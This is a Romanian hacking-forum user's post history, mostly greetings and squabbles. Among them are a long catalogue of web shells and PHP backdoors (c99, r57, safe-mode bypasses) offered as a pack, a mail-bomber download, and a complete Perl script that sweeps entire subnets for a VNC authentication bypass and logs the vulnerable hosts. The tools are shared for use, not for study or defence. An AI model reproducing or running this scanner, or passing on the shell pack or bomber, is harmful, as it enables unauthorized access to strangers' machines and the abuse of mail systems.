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Everything posted by LegioNRST

  1. A: Accept Language Ajan Ajax PHP Command Shell Ajaxcommandshell Antichat Shell v1.3 Antichat.php Antichat Shell Asmodeus v.01 Ayyildiz Tim -AYT Shell v2.1 aZRaiLPHP v1.0 B: Backdoor1.php Backdoor1 Backdoordfr Backup.php Backupsql.php BackupSQL Blind Shell.cpp C: c99 (1) c99 (2) c100 c2007.php Casus15.php cgi-python CMD CMDAsp ConnectBack2 Crystal Crystal Shell v1.0 ctt Shell.php ctt Shell Cyber Shell CyberShell.php Cybershell CyberSpy5 D: dC3 Security Crew Shell Private Dive Shell 1.0 diveshell DTool Pro dtoolpro Dx (1) Dx (2) DxShell Dx Shell_hk E: EFSO 2 Elmali Seker ElmaliSeker erne F: FatalShell FatalShell 2 FuckPHPShell G: GFS web-shell v 3.1.7 Gfs Shell 1 Gfs Shell 2 GsC Shell H: h4ntu Shell Hackeronurshell hantushell heykir I: img.php iMHaPFtp.php iMHaPFTP includewshell Inderxer indexer ironshell J: Java Shell Jsp WebShell 1.2 K: KAdot Universal Shell Kaushell Klasvayv L: Lamashell Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit load shell.php load shell lurm safe mode M: mailer3.php matamu Moroccan Spamers myshell.php MySQL Interface v1.0 MySQL Web Inferface v0.8 mysql.php mysql Shell Mysql Tool.php N: NCC Shell network.php NetworkFileManagerPHP NIX Remote Web Shell Nshell 1 Nshell 2 nstview.php NT Addy ntdaddy P: Perlbot.pl PH Hayv PHANTASMA PHP Backdoor Connect PHP Shell.php PHP-Backdoor15 PHP-Backdoor PHP include w-shell PHPInjection PHPInjectionShell PHPjackal PHPremoteview PHPshell17 PHvayv.php PHvayv Python Shell Private 13lue Private 13lue.php Private 13lue v3 pws.php pws ru24 Post Shell R: r57 Shell.php r57.php r57ifx r577.php Rader.php Rem Exp.asp Rem View.php RootShell ru24 Post Shell.php ru24 Post Shell 2 Russian.php S: s72 Shell v1.1 Coding s72 s.php Safe0ver Shell - SafeMod Bypass Safe Mode Bypass PHP 4.4.2 and PHP 5.1.2 safemodeshell1 safeover Server Variables Shell.php Shellbot.pl SimAttacker v1.0.0 simattacker simple_cmd simple backdoor 1 simple backdoor 2 SimShell 1.0 Simorgh Security MGZ simshell Sincap.php Sincapshell smtpd.py sniper Sniper_SA Shell Spy.php SQL.php T: telner.cgi telnet.pl telnetd.pl Test.php Therules25 Tool25 Tool.asp U: Uploader.php W: W3d.php w4k.php w4k w.php wText wacking.php webadmins WebShell WebShell WinX Shell 1 winxshell 2 Worse Linux Shell X: xinfo.pgp xinfo.txt Z: zacosmall.php zacosmall.txt Zehir4 (1) Zehir4 (1) MD5: ba029110a3e885f790bbf9694cef9702 //LE: +1rep daca ati apreciat.
  2. LegioNRST


    Tare clipul mosule.
  3. Welcome.
  4. LegioNRST


    Bun venit.
  5. Foloseste tag-ul Code.
  6. http://www.youtube.com/watch?v=u6nF6_y-4RM
  7. Nu e treaba ca vreau eu sursa si nu fac nici pe desteptul dar lumea are dreptul la informatie. Sunt sigur ca nu ai trecut pe aici si daca ai trecut nu ai citit tot pentru ca ti s-a parut mult. PS: Scanat cu NoVirusThanx si este Clean. Urmeaza sa ii fac un test.
  8. Nici el nu stie pentru ca da copy aiurea de pe alte forumuri si nu pune nici sursa ca sa ne informam corect.
  9. Multam. Chiar acum instalam vb-ul.
  10. Super tare. Vreau si eu cont daca se poate.
  11. Bun venit. Treci si pe aici
  12. Bun venit, sedere placuta!
  13. Trebuie sa o decriptezi.
  14. Si pe virustotal e la fel. Pune tu alt scanner daca ai.
  15. Uploadeaza-l pe UppIT - Free File Sharing si scaneaza-l pe Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org
  16. Lucreaza bine. E bine ca ai pus si sursa.
  17. Bun venit!
  18. Schimba linkul. "404 Page Not Found"
  19. Ciudat. Acum am auzit de acel site.
  20. Poti intelege ca pe ala il cheama DAISUKE, iar programul se numeste Deisuke's si nu este facut de un italian? Nu mai venii cu acuzatii aiurea!
  21. Ar fii o idee si cum a spus M4T3! "gen sunteti filati, aveti 24 de ore sa aduceti telefonul si mi retrag plangerea". Incearca si asa poate se sperie si cine stie:))
  22. Nu am copiat de pe nici un forum. Programul l-am avut de mult timp intr-o arhiva cu programe hack. Si astazi mi la cerut cineva si am zis sa postez. Nu mai fii asa sigur!
  23. #!/usr/bin/perl # Multi-threaded scan for OpenVNC 4.11 authentication bypass. use strict; # why not? use warnings; use IO::Socket; use threads; use threads::shared; use Errno qw(EAGAIN); # Configuration variables use constant VNC_PORT => 5900; my $splits = 5; # Creates 2^N processes. my $avg_time = 5; # Tweak this to get better time estimates. our $subnet; our @results : shared; our $todo = 0; my $orig_thread = "yes"; my $start; my $end; my $time_estimate; my $elapsed = time; my $out_file; ++$|; # To watch as the results come in, in real time. $subnet = $ARGV[0] || ""; # Get subnet from command line, else ask for it. while (1) { last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/; print "\nWhat subnet do you want to scan? "; chomp($subnet = <STDIN>); print "That does not look right. Enter something like 192.168.1.*\n\n"; } # Put the subnet in the form x.y.z. so we can just concatenate the hostnum. $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/; $subnet .= "."; $out_file = "VNC_" . $subnet . "txt"; # Mostly a guesstimate $time_estimate = $avg_time * (256 / (2**$splits)); $time_estimate = int ($time_estimate / 60); $time_estimate += 4; print "\nScanning subnet ${subnet}x -- this should take approximately $time_estimate minute(s).\n"; print "[!] = Vulnerable, [*] = Safe, [.] = No response.\n\n"; CHECK: { unless ($splits >= 0 && $splits <= 8) { die "ERROR: Do not split $splits times--that makes no sense.\n"; } unless ($splits <= 5) { warn "Reduce the number of splits from $splits to 5 or less if you get memory errors.\n\n"; } } # Ugly, but this works. DivideWork() if $splits >= 1; DivideWork() if $splits >= 2; DivideWork() if $splits >= 3; DivideWork() if $splits >= 4; DivideWork() if $splits >= 5; DivideWork() if $splits >= 6; DivideWork() if $splits >= 7; DivideWork() if $splits >= 8; # Which IPs this thread scans. $start = $todo << (8 - $splits); $end = $start + (256 / (2**$splits)) - 1; foreach ($start .. $end) { Scan_VNC($_); } wait until $?; # Wait for children to finish. exit unless $orig_thread eq "yes"; # Only the original parent thread will continue. $elapsed = time - $elapsed; $elapsed /= 60; $elapsed = int $elapsed; print "\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n"; SaveData(); exit; #################################### sub DivideWork { my $pid; FORK: { $todo *= 2; if ($pid = fork) { # Parent ++$todo; } elsif (defined $pid) { # Child $orig_thread = "no"; } elsif ($! == EAGAIN) { # Recoverable forking error. sleep 7; redo FORK; } else { # Unable to fork. die "Unable to fork: $!\n"; } } } sub SaveData { my $vulns = 0; open(FOUND, ">", $out_file) or die "Cannot open $out_file -- $!"; foreach my $IP (1..254) { my $record; $record = $results[$IP]; unless ($record =~ m/not vulnerable/io) { ++$vulns; print FOUND $record; } } print FOUND "\nVulnerabilites found: $vulns"; close(FOUND) or die "Cannot close $out_file -- $!"; print "Data saved to ${out_file}\n\n"; } sub Scan_VNC { # Scan for OpenVNC 4.11 authentication bypass. my $hostnum = shift; my $host = $subnet . $hostnum; my $sock; my $proto_ver; my $ignored; my $auth_type; my $sec_types; my $vnc_data; $host or die("ERROR: no host passed to Scan_VNC.\n"); # The host numbers .0 and .255 are reserved; ignore them. if ($hostnum <= 0 or $hostnum >= 255) { return; } # Format things nicely--that crazy formula just adds spaces. $results[$hostnum] = "$host"; $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = "; unless ($sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => VNC_PORT, Proto => 'tcp',)) { $results[$hostnum] .= "Not vulnerable, no response.\n"; print "."; return; } # Negotiate protocol version. $sock->read($proto_ver, 12); print $sock $proto_ver; # Get supported security types and ignore them. $sock->read($sec_types, 1); $sock->read($ignored, unpack('C', $sec_types)); # Claim that we only support no authentication. print $sock "\x01"; # We should get "0000" back, indicating that they won't fall back to no authentication. $sock->read($auth_type, 4); if (unpack('I', $auth_type)) { $results[$hostnum] .= "Not vulnerable, refused to support authentication type.\n"; print "*"; close($sock); return; } # Client initialize. print $sock "\x01"; # If the server starts sending data, we're in. $sock->read($vnc_data, 4); if (unpack('I', $vnc_data)) { $results[$hostnum] .= "VULNERABLE! $proto_ver\n"; print "!"; } else { $results[$hostnum] .= "Not vulnerable, did not send data.\n"; print "*"; } close($sock); return; }
  24. Am gasit astazi prin pc un Mail Bomber mult mai avansat decat ce am vazut pana acum si m-am gandit sa-l impartasesc cu voi. Image: Virus Scan: Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Download: http://depositfiles.com/files/7yfa12ryc
  25. Bine ai venit!
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